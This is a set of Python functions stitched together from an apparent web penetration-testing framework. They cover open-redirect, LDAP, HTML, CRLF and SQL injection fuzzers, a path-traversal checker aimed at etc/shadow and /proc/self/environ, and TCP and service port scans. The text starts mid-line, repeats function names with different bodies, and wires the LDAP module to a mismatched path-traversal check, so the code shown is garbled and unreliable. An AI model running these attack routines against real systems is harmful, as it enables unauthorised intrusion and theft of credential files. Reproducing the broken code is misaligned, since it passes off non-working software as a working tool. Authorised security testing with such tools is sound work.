+ ' +--------+----------+') print(P + ' | ' + C + 'PORT' + P + ' ' + '| ' + C + 'STATE' + P + ' ' + '|') print(P + ' +--------+----------+') lvl2 = "getports" module = "ScanANDEnum" lvl1 = "Scanning & Enumeration" lvl3 = "" if open_ports: for i in sorted(open_ports): c = str(i) if len(c) == 1: print(P + ' | ' + C + c + P + ' | ' + C + 'OPEN' + P + ' ' + '|') print(P + ' +--------+----------+') time.sleep(0.2) elif len(c) == 2: print(P + ' | ' + C + c + P + ' ' + P + '| ' + C + 'OPEN' + P + ' ' + '| ') print(P + ' +--------+----------+') time.sleep(0.2) elif len(c) == 3: print(P + ' | ' + C + c + P + ' ' + '| ' + C + 'OPEN' + P + ' ' + '| ') print(P + ' +--------+----------+') time.sleep(0.2) elif len(c) == 4: print(P + ' | ' + C + c + P + ' ' + '| ' + C + 'OPEN' + P + ' ' + '| ') print(P + ' +--------+----------+') time.sleep(0.2) elif len(c) == 5: print(P + ' | ' + C + c + P + ' ' + '| ' + C + 'OPEN' + P + ' ' + '| ') print(P + ' +--------+----------+') time.sleep(0.2) data = "Open Ports: " + str(open_ports) save_data(database, module, lvl1, lvl2, lvl3, name, data) else: save_data(database, module, lvl1, lvl2, lvl3, name, "No open ports found.") print(R + "\n [-] No open ports found.!!\n") print(B + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown') print(G + " [+] Host %s scanned in %s seconds" % (host, total_time) + C + color.TR2 + C + "\n") except KeyboardInterrupt: print(R + "\n [-] User requested shutdown... ") print(' [-] Exiting...\n') quit()
def openredirect(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Critical Vulnerabilities" global lvl3 lvl3 = "" time.sleep(0.6) #print(R+'\n ===========================================') #print(R+'\n O P E N R E D I R E C T C H E C K E R') #print(R+' ---<>----<>----<>----<>----<>----<>----<>--\n') from core.methods.print import pvln pvln("open redirect checker") try: if properties["PARAM"][1] == " ": param = input( O + ' [§] Scope parameter to test (eg. /redirect.php?site=foo) :> ' ) else: param = properties["PARAM"][1] if '?' in param and '=' in param: if param.startswith('/'): m = input( GR + '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> ' ) if m == 'y': web00 = web + param elif m == 'n': web00 = web + param else: print(R + ' [-] U mad?') else: web00 = web + '/' + param else: print(R + ' [-] Your input does not match a parameter...') param = input(O + ' [§] Enter paramter to test :> ') if properties["PARALLEL"][1] == " ": pa = input(" [?] Parallel Attack? (enter if not) :> ") parallel = pa != "" else: parallel = properties["PARALLEL"][1] == "1" print(GR + ' [*] Configuring relative headers...') time.sleep(0.8) gen_headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language': 'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection': 'close' } if properties["DICT"][1] == " ": print(O + ' [!] Enter path to payload file ' + R + '(Default: files/payload-db/openredirect_payloads.lst)') fi = input(O + ' [§] Your input (Press Enter if default) :> ') elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': fi = 'files/payload-db/openredirect_payloads.lst' getPayloads0x00(fi) else: if os.path.exists(fi) == True: print(G + ' [+] File found under ' + fi) getPayloads0x00(fi) else: print(R + ' [-] File not found... Using default payload...') fi = 'files/payload-db/openredirect_payloads.lst' getPayloads0x00(fi) if properties["COOKIE"][1] == " ": input_cookie = input( "\n [§] Got any cookies? [just enter if none] :> ") elif properties["COOKIE"][1].lower() == "none": input_cookie = "" else: input_cookie = properties["COOKIE"][1] if (len(input_cookie) > 0): gen_headers['Cookie'] = input_cookie print(GR + ' [*] Configuring payloads with Url...') success = [] if not parallel: success += check0x00(web00, gen_headers, payloads) else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(check0x00, args=( web00, gen_headers, l, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "Open Redirect Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] Open Redirect Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "No payload succeeded.") except KeyboardInterrupt: print(R + ' [-] User Interruption Detected!') pass
def check0x00(website0, gen_headers, parallel): #print(query) #print(siteinput) loggy = [] enviro = [] fud = [] generic = [] cnfy = [] gotcha = [] if properties["EVASION"][1] == " ": ev = input( C + "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> " ) evasion = ev != "" else: evasion = properties["EVASION"][1] == "1" if not evasion: if properties["DICT"][1] == " ": print(C + ' [!] Enter the filename containing paths ' + O + '(Default: files/pathtrav_paths.lst)' + C) fi = input(C + " [*] Custom filepath (press Enter for default) :> ") elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': print(GR + ' [*] Using default filepath...') fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst') else: fi = getFile0x00(fi) filepath = "" else: fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst') if properties["FILE"][1] == " ": filepath = input( " [!] Enter file and path to search (Default: etc/shadow) :> ") elif properties["FILE"][1].lower() == "none": filepath = "" else: filepath = properties["FILE"][1] if (active0 is False): owebsite = website0 else: #owebsite = ahurl owebsite = website0 print("") requests = session() if not parallel: for line in open(fi): paths = atck(evasion, filepath, owebsite, line, requests) gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] else: pathlist = file2list(fi) pthlst = listsplit(pathlist, round(len(pathlist) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(atckpre, args=( evasion, filepath, owebsite, l, requests, )) for l in pthlst ] #res1 = pool.apply_async(portloop, ) for i in res: paths = i.get() gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] #print(G+"\n [+] Retrieved %s interesting paths..." % str(len(gotcha))+C+"\n") #print("\n{}———————{}·‹› {}Pathtrav: {}{} int. paths{} ‹›·{}———————{}\n".format(color.END,C,O,G,str(len(gotcha)),C,color.END,C)) foundpaths = " {}{}{}{}{}{}{}{} paths leaked.".format( color.TR5, C, G, str(len(gotcha)), color.END, color.TR2, color.END, color.CURSIVE) summary("pathtrav", foundpaths) time.sleep(0.5) if len(loggy) > 0: printOut0x00("Logs", loggy) if len(enviro) > 0: printOut0x00("/proc/self/environ", enviro) if len(fud) > 0: printOut0x00("/proc/self/fd", fud) if len(cnfy) > 0: printOut0x00("Configuration", cnfy) if len(generic) > 0: printOut0x00("Diverse", generic)
def ldap(web): print(GR + ' [*] Loading module...') time.sleep(0.5) #print(R+'\n =============================') #print(R+'\n L D A P I N J E C T I O N') #print(R+' ——·‹›·––·‹›·——·‹›·——·‹›·––·‹›\n') from core.methods.print import pvln pvln("ldap Injection") try: if properties["PARAM"][1] == " ": web0 = input( O + ' [§] Parameter path to test (eg. /lmao.php?foo=bar) :> ') else: web0 = properties["PARAM"][1] if "?" in web0 and '=' in web0: if web0.startswith('/'): m = input( GR + '\n [!] Your path starts with "/".\n [§] Do you mean root directory? (Y/n) :> ' ) if m.lower() == 'y': web00 = web + web0 elif m.lower() == 'n': web00 = web + web0 else: print(R + ' [-] U mad?') else: web00 = web + '/' + web0 else: sys.exit(R + " [-] Invalid parameters." + C) print(B + ' [+] Parameterised Url : ' + C + web00) if properties["PARALLEL"][1] == " ": pa = input(" [?] Parallel Attack? (enter if not) :> ") parallel = pa is not "" else: parallel = properties["PARALLEL"][1] == "1" if properties["COOKIE"][1] == " ": input_cookie = input( "\n [*] Enter cookies if needed (Enter if none) :> ") elif properties["COOKIE"][1].lower() == "none": input_cookie = "" else: input_cookie = properties["COOKIE"][1] print(GR + ' [*] Setting headers...') time.sleep(0.6) gen_headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language': 'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection': 'close' } if (len(input_cookie) > 0): gen_headers['Cookie'] = input_cookie if properties["DICT"][1] == " ": print(O + ' [§] Enter the payloads file ' + R + '(Default: files/payload-db/ldap_payloads.lst)...') fi = input(O + ' [§] Your input (Press Enter for default) :> ') elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': fi = 'files/payload-db/ldap_payloads.lst' getFile0x00(fi) else: if os.path.exists(fi) == True: print(G + ' [+] File under ' + fi + ' found!') getFile0x00(fi) else: print(R + ' [-] Invalid input... Using default...') fi = 'files/payload-db/ldap_payloads.lst' getFile0x00(fi) print(O + ' [!] Parsing url...') time.sleep(0.7) web000 = web00.split('=')[0] + '=' print(GR + ' [*] Starting enumeration...') time.sleep(0.7) success = [] if not parallel: success += check0x00(web000, gen_headers, payloads) else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(check0x00, args=( web000, gen_headers, l, )) for l in paylists ] for y in res: i = y.get() success += i if success: print(" [+] LDAPi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) except KeyboardInterrupt: print(R + ' [-] Aborting module...') pass except Exception as e: print(R + ' [-] Exception : ' + str(e)) print(G + '\n [+] LDAP Injection module completed!\n')
def check0x00(website0, gen_headers, parallel): #print(query) #print(siteinput) loggy = [] enviro = [] fud = [] generic = [] cnfy = [] gotcha = [] if properties["EVASION"][1] == " ": ev = input( O + "\n [?] Perform Evasion Attack? (specific file ; enter for no) :> " ) evasion = ev != "" else: evasion = properties["EVASION"][1] == "1" if not evasion: if properties["DICT"][1] == " ": print(O + ' [!] Enter the filename containing paths ' + R + '(Default: files/pathtrav_paths.lst)') fi = input(O + " [*] Custom filepath (press Enter for default) :> ") elif properties["DICT"][1].lower() == "none": fi = "" else: fi = properties["DICT"][1] if fi == '': print(GR + ' [*] Using default filepath...') fi = getFile0x00('files/fuzz-db/pathtrav_paths.lst') else: fi = getFile0x00(fi) filepath = "" else: fi = getFile0x00('files/fuzz-db/pathtrav_evasion.lst') if properties["FILE"][1] == " ": filepath = input( " [!] Enter file and path to search (Default: etc/shadow) :> ") elif properties["FILE"][1].lower() == "none": filepath = "" else: filepath = properties["FILE"][1] if (active0 is False): owebsite = website0 else: #owebsite = ahurl owebsite = website0 print("") if not parallel: for line in open(fi): paths = atck(evasion, filepath, owebsite, line) gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] else: pathlist = file2list(fi) pthlst = listsplit(pathlist, round(len(pathlist) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(atckpre, args=( evasion, filepath, owebsite, l, )) for l in pthlst ] #res1 = pool.apply_async(portloop, ) for i in res: paths = i.get() gotcha += paths[0] generic += paths[1] loggy += paths[2] enviro += paths[3] fud += paths[4] cnfy += paths[5] print(G + "\n [+] Retrieved %s interesting paths...\n" % str(len(gotcha))) time.sleep(0.5) printOut0x00("Logs", loggy) printOut0x00("/proc/self/environ", enviro) printOut0x00("/proc/self/fd", fud) printOut0x00("Configuration", cnfy) printOut0x00("Generic", generic)
def htmli(web): print(GR+' [*] Loading module...') time.sleep(0.5) #print(R+'\n =============================') #print(R+'\n H T M L I N J E C T I O N') #print(R+' ——·‹›·––·‹›·——·‹›·––·‹›·–—·‹›\n') from core.methods.print import pvln pvln("html injection") gen_headers = {'User-Agent':'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language':'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection':'close'} print(GR+' [*] Initiating '+R+'Parameter Based Check...') param = input(O+' [#] Scope parameter (eg. /vuln/page.php?q=lmao) :> ') if param.startswith('/') == False: param = '/' + param choice = "" if "&" in param: ln = len(param.split("&")) choice = input(" [!] Discovered {} parameters. Which one to use? (enter name) :> ".format(ln)) if not choice in param: sys.exit(" [-] Param {} not found.".format(choice)) bug2 = "" if choice != "": n = param.split(choice + "=")[1] if "&" in n: bug2 = param.split(choice)[1] tmp = bug2.split("&")[0] bug2 = bug2.replace(tmp,"") pa = input("\n [?] Parallelise Attack? (enter if not) :> ") parallel = pa is not "" e = getFile0x00() web00 = web + param.split(choice + '=')[0] + choice + '=' try: success = [] if not parallel: for pay in payloads: print(GR+'\n [*] Setting parameters...') web0x00 = web00 + pay + bug2 print(C+' [+] Using payload : '+B+str(pay)) print(B+' [+] Using !nfected Url : '+GR+str(web0x00)) # display whats going on success += check0x00(web0x00, pay, gen_headers) # check the outupt of the fuzz else: paylists = listsplit(payloads, round(len(payloads)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(checkpre, args=(l, web00, bug2, gen_headers,)) for l in paylists] for y in res: i = y.get() success += i if success: print(" [+] HTMLi Vulnerability found! Successful payloads:") for i in success: print(i) else: print(R + "\n [-] No payload succeeded."+C) except Exception as e: print(R+' [-] Unexpected Exception Encountered!') print(R+' [-] Exception : '+str(e)) print(G+'\n [+] HTMLi Module Completed!')
def manual0x00(web, parallel, properties): #print(R+'\n ========================') print(R + '\n S Q L i (Manual Mode)') print(R + ' ---<>----<>----<>----<>-\n') requests = session() if properties["PARAM"][1] == " ": bug = input(O + ' [§] Injectable Endpoint ' + R + '(eg. /sqli/fetch.php?id=2)' + O + ' :> ') else: bug = properties["PARAM"][1] bugs = web + bug getrq = requests.get(bugs, timeout=7, verify=False) choice = "" if "&" in bug: ln = len(bug.split("&")) choice = input( " [!] Discovered {} parameters. Which one to use? (enter name) :> " .format(ln)) if not choice in bug: sys.exit(" [-] Param {} not found.".format(choice)) bug2 = "" param1 = "" if choice != "": n = bug.split(choice + "=")[1] if "&" in n: bug2 = bug.split(choice + "=")[1] param1 = bug2.split("&")[0] bug2 = bug2.replace(param1, "") bugs = web + bug.split(choice + '=')[0] + choice + '=' + param1 print(O + ' [!] Using Url : ' + GR + bugs) if '?' in str(bugs) and '=' in str(bugs): success = [] if not parallel: for p in pay: bugged = bugs + str(p) + bug2 print(B + " [*] Trying : " + C + bugged) sleep(0.7) response = requests.get(bugged) if len(response.content) != len(getrq.content): print('\n' + G + ' [+] Vulnerable link detected : ' + bugs) print(GR + ' [*] Injecting payloads...') print(B + ' [!] PoC : ' + str(bugged)) print(R + " [!] Payload : " + O + p + '\033[0m') print("\033[1m [!] Code Snippet :\n \033[0m" + str(response) + '\n') success.append(p) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(manualpre, args=( bugs, bug2, l, getrq, )) for l in paylists ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: data = "SQLi Vulnerability found!\nVulnerable Link: " + bugs + "\nSuccessful payloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print(" [+] SQLi Vulnerability found! Successful payloads:") for i in success: print(i) else: save_data(database, module, lvl1, lvl2, lvl3, name, "(manual) no payload succeeded.") print(R + "\n [-] No payload succeeded." + C) else: print(R + ' [-] Enter an URL with scope parameter...') manual0x00(web, parallel, properties)
def crlf(web): global name name = targetname(web) global lvl2 lvl2 = inspect.stack()[0][3] global module module = "VulnAnalysis" global lvl1 lvl1 = "Critical Vulnerabilities" global lvl3 lvl3 = "" time.sleep(0.5) #print(R+'\n =============================') #print(R+'\n C R L F I N J E C T I O N') #print(R+' ---<>----<>----<>----<>----<>\n') from core.methods.print import pvln pvln("CRLF Injection") gen_headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201', 'Accept-Language': 'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection': 'close' } inf_headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201%0d%0aSet-Cookie: Infected_by=Drake', 'Accept-Language': 'en-US;', 'Accept-Encoding': 'gzip, deflate', 'Accept': 'text/html,application/xhtml+xml,application/xml;', 'Connection': 'close' } print(GR + ' [*] Testing response to normal requests...') time.sleep(0.5) print(O + ' [*] Setting header values...') time.sleep(0.7) print(O + ' [*] Initiating ' + R + 'User-Agent Based Check...') time.sleep(0.5) print(B + ' [+] Injecting CRLF in User-Agent Based value : ' + C + '%0d%0a ...') time.sleep(0.7) print(O + ' [*] Using !nfected UA Value : ' + inf_headers['User-Agent']) m = getHeaders0x00(web, inf_headers) success = [] success += check0x00( m, 'Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201%0d%0aSet-Cookie: Infected_by=Drake' ) print(GR + ' [*] Initiating ' + R + 'Parameter Based Check...') if properties["PARAM"][1] == " ": param = input(O + ' [§] Scope parameter (eg. /vuln/page.php?crlf=x) :> ') else: param = properties["PARAM"][1] if not param.startswith('/'): param = '/' + param if properties["PARALLEL"][1] == " ": pa = input("\n [?] Parallelise Attack? (enter if not) :> ") parallel = pa != "" else: parallel = properties["PARALLEL"][1] == "1" e = getFile0x00() web0 = web + param web00 = web0.split('=')[0] + '=' try: if not parallel: for pay in payloads: web0x00 = web00 + pay print(C + ' [+] Using payload : ' + B + str(pay)) print(B + ' [+] Using !nfected Url : ' + GR + str(web0x00)) p = getHeaders0x00(web0x00, gen_headers) success += check0x00(p, pay) else: paylists = listsplit(payloads, round(len(payloads) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(checkpre, args=( l, web00, gen_headers, )) for l in paylists ] for y in res: i = y.get() success += i if success: data = "CRLF Injection Vulnerability found!\nVulnerable param: " + web00 + "\nPayloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] CRLF Injection Vulnerability found! Successful payloads:" ) for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "No payload succeeded.") except Exception as e: print(R + ' [-] Unexpected Exception Encountered!') print(R + ' [-] Exception : ' + str(e)) print(G + ' [+] CRLF Module Completed!')
def sqlicookie0x00(web, parallel): #print(R+'\n =========================') print(R + '\n S Q L i (Cookie Based)') print(R + ' ---<>----<>----<>----<>--\n') sleep(0.5) vsession = session() req = vsession.get(web) if vsession.cookies: print(G + ' [+] This website supports session cookies...') success = [] if not parallel: for i in pay: print(B + " [*] Trying Payload : " + C + '' + i) time.sleep(0.7) for cookie in vsession.cookies: cookie.value += i print(O + ' [+] Using ' + R + '!nfected' + O + ' cookie : ' + GR + cookie.value) r = vsession.get(web) if len(r.content) != len(req.content): poc = C + " [+] PoC : " + O + cookie.name + " : " + GR + cookie.value print( G + " [+] Blind Based SQli (Cookie Based) Detected! " ) print(poc) print(P + ' [+] Code : ' + W + str(r.text) + '\n') success.append(i) else: paylists = listsplit(pay, round(len(pay) / processes)) with Pool(processes=processes) as pool: res = [ pool.apply_async(cookiepre, args=( vsession, web, l, req, )) for l in paylists ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() success += j if success: data = "SQLi Vulnerability (Cookie) found!\nSuccessful payloads: " + str( success) save_data(database, module, lvl1, lvl2, lvl3, name, data) print( " [+] SQLi Vulnerability (Cookie) found! Successful payloads:" ) for i in success: print(i) else: print(R + "\n [-] No payload succeeded." + C) save_data(database, module, lvl1, lvl2, lvl3, name, "(cookie) no payload succeeded.") else: print(R + ' [-] No support for cookies...') time.sleep(0.5) print(R + ' [-] Cookie based injection not possible...') data = "No support for cookies. Cookie based injection not possible." save_data(database, module, lvl1, lvl2, lvl3, name, data)
def service0x00(host): #print(R+'\n ===================================') #print(R + " S E R V I C E D E T E C T I O N") #print(R + ' ===================================\n') from core.methods.print import pscan pscan("service detection") if properties["INIT"][1] == " ": start_port = input(C+' [§] Enter initial port :> ') else: start_port = properties["INIT"][1] if properties["FIN"][1] == " ": end_port = input(C+' [§] Enter ending port :> ') else: end_port = properties["FIN"][1] start_port = int(start_port) end_port = int(end_port) open_ports = [] closed_ports = [] try: ip = socket.gethostbyname(host) print(G+'\n [+] Target server detected up and running...'+C+color.TR2+C) print(O+' [*] Preparing for scan...'+C) pass except Exception: print(R+' [-] Server not responding...') time.sleep(0.3) print(R+' [*] Exiting...') quit() if properties["VERBOSE"][1] == " ": mn = input(C+'\n [?] Do you want a verbose output (enter if not) :> ') verbose = mn != "" else: verbose = properties["VERBOSE"][1] == "1" if verbose: print(''+P+'\n [+] Verbose mode selected !\n') print(GR+" [!] Scanning %s from port %s - %s: " % (host, start_port, end_port)) print(G+" [*] Scanning started at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C) starting_time = time.time() try: if verbose: print(O+" [*] Scan in progress.."+C) time.sleep(0.8) portrange = range(start_port, end_port+1) prtlst = listsplit(portrange, round(len(portrange)/processes)) with Pool(processes=processes) as pool: res = [pool.apply_async(portloop, args=(l,host,verbose,)) for l in prtlst] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() open_ports += j[0] closed_ports += j[1] print(G+"\n [+] Scanning completed at %s" %(time.strftime("%I:%M:%S %p"))+C+color.TR2+C) ending_time = time.time() total_time = ending_time - starting_time print(P+' [*] Preparing report...\n'+C) time.sleep(1) openports = " {}{}{}{}{}{}{}{} ports open.".format(color.TR5,C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE) summary("servicedetect", openports) print() print(P+' +--------+----------+-----------+') print(P+' | '+C+'PORT '+P+'| '+C+'STATE '+P+'| '+C+'SERVICE '+P+'|') print(P+' +--------+----------+-----------+') if open_ports: data = "Port:Service >>\n" for i in sorted(open_ports): service = get_servicev(i) if not service: service = "Unknown" m = str(service) c = str(i) data = data + "\n" + c + ":" + m if len(c) == 1: print(P+' | '+C+c+P+' | '+C+'OPEN '+P+'| '+C+m+'') print(P+' +--------+----------+-----------+') time.sleep(0.2) elif len(c) == 2: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'') print(P+' +--------+----------+-----------+') time.sleep(0.2) elif len(c) == 3: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'') print(P+' +--------+----------+-----------+') time.sleep(0.2) elif len(c) == 4: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'') print(P+' +--------+----------+-----------+') time.sleep(0.2) elif len(c) == 5: print(P+' | '+C+c+' '+P+'| '+C+'OPEN '+P+'| '+C+m+'') print(P+' +--------+----------+-----------+') time.sleep(0.2) save_data(database, module, lvl1, lvl2, lvl3, name, data) else: save_data(database, module, lvl1, lvl2, lvl3, name, "No open ports found.") print(R+"\n [-] No open ports found.!!\n") print(B+'\n [!] ' + str(len(closed_ports)) + ' closed ports not shown') print(G+" [+] Host %s scanned in %s seconds" %(host, total_time)+C+color.TR2+C+"\n") except KeyboardInterrupt: print(R+"\n [-] User requested shutdown... ") print(' [-] Exiting...\n') quit()
def scan0x00(target): try: #print(R+'\n =================================') #print(R+' T C P C O N N E C T S C A N ') #print(R+' =================================\n') from core.methods.print import pscan pscan("tcp connect scan") if properties["INIT"][1] == " ": min_port = input(C + ' [§] Enter initial port :> ') else: min_port = properties["INIT"][1] if properties["FIN"][1] == " ": max_port = input(C + ' [§] Enter ending port :> ') else: max_port = properties["FIN"][1] open_ports = [] closed_ports = [] ip_host = socket.gethostbyname(target) if properties["VERBOSE"][1] == " ": chk = input( C + ' [?] Do you want a verbose output? (enter if not) :> ') verbose = chk is not "" else: verbose = properties["VERBOSE"][1] == "1" print(GR + ' [*] Checking port range...') if int(min_port) >= 0 and int(max_port) >= 0 and int(max_port) >= int( min_port) and int(max_port) <= 65536: print(P + ' [!] Port range detected valid...' + C) time.sleep(0.3) print(GR + ' [*] Preparing for the scan...') ports = range(int(min_port), int(max_port) + 1) # Build range from given port numbers prtlst = listsplit(ports, round(len(ports) / processes)) starting_time = time.time() # Start clock for scan time SYNACK = 0x12 # Set flag values for later reference RSTACK = 0x14 checkhost(ip_host) # Run checkhost() function from earlier print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" + C + color.TR2 + C + "\n") # Confirm scan start with Pool(processes=processes) as pool: res = [ pool.apply_async(portloop, args=( l, verbose, ip_host, )) for l in prtlst ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() open_ports += j[0] closed_ports += j[1] print(G + "\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C) ending_time = time.time() total_time = ending_time - starting_time print(P + ' [*] Preparing report...\n' + C) time.sleep(1) openports = " {}{}{}{}{}{}{}{} ports open.".format( color.TR5, C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE) summary("tcp connect", openports) print() print(P + ' +--------+------------------+') print(P + ' | ' + GR + 'PORT ' + P + '| ' + C + 'STATE ' + P + '|') print(P + ' +--------+------------------+') if open_ports: for i in sorted(open_ports): c = str(i) if len(c) == 1: print(P + ' | ' + C + c + P + ' | ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) print('') else: print(R + ' [-] No open ports found!') print(B + ' [!] ' + str(len(closed_ports)) + ' closed ports not shown') print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) + C + color.TR2 + C + "\n") else: # If range didn't raise error, but didn't meet criteria print(R + "\n [!] Invalid Range of Ports") print(" [!] Exiting...") quit() except Exception as e: # If input range raises an error print(e) quit()
def scan0x00(target): try: #print(R+'\n =================================') #print(R+' T C P S T E A L T H S C A N ') #print(R+' =================================\n') from core.methods.print import pscan pscan("tcp stealth scan") if properties["INIT"][1] == " ": min_port = input(C + ' [§] Enter initial port :> ') else: min_port = properties["INIT"][1] if properties["FIN"][1] == " ": max_port = input(C + ' [§] Enter ending port :> ') else: max_port = properties["FIN"][1] open_ports = [] closed_ports = [] ip_host = socket.gethostbyname(target) if properties["VERBOSE"][1] == " ": chk = input( C + ' [?] Do you want a verbose output? (enter if not) :> ') verbose = chk != "" else: verbose = properties["VERBOSE"][1] == "1" try: print(GR + ' [*] Checking port range...') if int(min_port) >= 0 and int(max_port) >= 0 and int( max_port) >= int(min_port) and int(max_port) <= 65536: print(P + ' [!] Port range detected valid...' + C) time.sleep(0.3) print(GR + ' [*] Preparing for the scan...') pass else: print(R + "\n [!] Invalid Range of Ports") print(" [!] Exiting...") quit() except Exception: print(R + "\n [!] Invalid Range of Ports") print(" [!] Exiting...") quit() ports = range(int(min_port), int(max_port) + 1) prtlst = listsplit(ports, round(len(ports) / processes)) starting_time = time.time() SYNACK = 0x12 RSTACK = 0x14 checkhost(target) print(G + " [!] Scanning initiated at " + strftime("%H:%M:%S") + "!" + C + color.TR2 + C + "\n") # Confirm scan start with Pool(processes=processes) as pool: res = [ pool.apply_async(portloop, args=( l, verbose, ip_host, )) for l in prtlst ] #res1 = pool.apply_async(portloop, ) for i in res: j = i.get() open_ports += j[0] closed_ports += j[1] print(G + "\n [!] Scanning completed at %s" % (time.strftime("%I:%M:%S %p")) + C + color.TR2 + C) ending_time = time.time() total_time = ending_time - starting_time print(P + ' [*] Preparing report...\n' + C) time.sleep(1) openports = " {}{}{}{}{}{}{}{} ports open.".format( color.TR5, C, G, str(len(open_ports)), color.END, color.TR2, color.END, color.CURSIVE) summary("tcp stealth", openports) print() print(P + ' +--------+------------------+') print(P + ' | ' + GR + 'PORT ' + P + '| ' + C + 'STATE ' + P + '|') print(P + ' +--------+------------------+') if open_ports: for i in sorted(open_ports): c = str(i) if len(c) == 1: print(P + ' | ' + C + c + P + ' | ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 2: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 3: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 4: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) elif len(c) == 5: print(P + ' | ' + C + c + ' ' + P + '| ' + C + 'OPEN ' + P + '|') print(P + ' +--------+------------------+') time.sleep(0.2) print('') data = "Open Ports: " + str(open_ports) save_data(database, module, lvl1, lvl2, lvl3, name, data) else: save_data(database, module, lvl1, lvl2, lvl3, name, "No open ports found.") print('' + R + " [-] Sorry, No open ports found.!!") print(C + '\n [!] ' + str(len(closed_ports)) + ' closed ports not shown') print(G + " [+] Host %s scanned in %s seconds" % (target, total_time) + C + color.TR2 + C + "\n") except KeyboardInterrupt: print(R + "\n [-] User Requested Shutdown...") print(" [*] Exiting...") quit()
